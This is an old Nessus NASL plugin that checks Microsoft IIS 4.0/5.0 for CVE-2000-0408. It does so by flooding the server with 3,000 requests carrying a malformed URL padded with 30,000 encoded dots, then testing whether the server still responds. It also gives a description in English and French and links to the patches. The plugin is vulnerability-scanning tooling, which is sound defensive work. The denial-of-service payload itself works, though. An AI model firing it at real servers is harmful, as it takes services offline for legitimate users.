#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
# Original code : USSR Lab (www.ussrback.com)
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10406);
 script_cve_id("CVE-2000-0408");
 name["english"] = "IIS Malformed Extension Data in URL";
 name["francais"] = "IIS Malformed Extension Data in URL";


 script_name(english:name["english"],
	     francais:name["francais"]);
 
 # Description
 desc["english"] = "
It was possible to make IIS use 100% of the CPU by
sending it malformed extension data in the URL
requested, preventing him to serve web pages
to legitimate clients.

Solution : Microsoft has made patches available at :
 - For Internet Information Server 4.0:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
 - For Internet Information Server 5.0:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904

Risk factor : Serious";


 desc["francais"] = "
Il s'est avr possible de forcer IIS a utiliser 100%
du CPU en lui envoyant des requetes ayant des
extensions mal formes, ce qui l'empeche de servir
des pages a des clients lgitimes.

Solution : Microsoft a fait des patchs, disponibles  :
 - Pour Internet Information Server 4.0:

   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
 - Pour Internet Information Server 5.0:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904

Facteur de risque : Srieux";

 script_description(english:desc["english"],
 		    francais:desc["francais"]);

 # Summary
 summary["english"] = "Performs a denial of service against IIS";
 summary["francais"] = "Provoque un dni de service contre un serveur IIS";
 script_summary(english:summary["english"],
 		francais:summary["francais"]);

 # Category
 script_category(ACT_DENIAL);

 # Dependencie(s)
 script_dependencie("find_service.nes");
 
 # Family
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"],
 	       francais:family["francais"]);
 
 # Copyright
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 
 script_require_ports("Services/www", 80);
 exit(0);
}


port = get_kb_item("Services/www");
if(!port)port = 80;

if(get_port_state(port))
{
 soc[0] = open_sock_tcp(port);
 if(!soc[0])exit(0);
 else close(soc[0]);

 file = "/%69%6E%64%78" + crap(data:"%2E", length:30000) + "%73%74%6D";
 a = http_get(item:file, port:port);

 for(i=0;i<3000;i=i+1)
 {
  soc[i] = open_sock_tcp(port);
  send(socket:soc[i], data:a);
 }


 s = open_sock_tcp(port);
 a = string("GET / HTTP/1.0\r\n\r\n");
 send(socket:s, data:a);

 r = recv(socket:s, length:1024);
 if(!r)
 {
  security_hole(port);
 }

 close(s);

 for(i=0;i<3000;i=i+1)
 {
 close(soc[i]);
 }
}

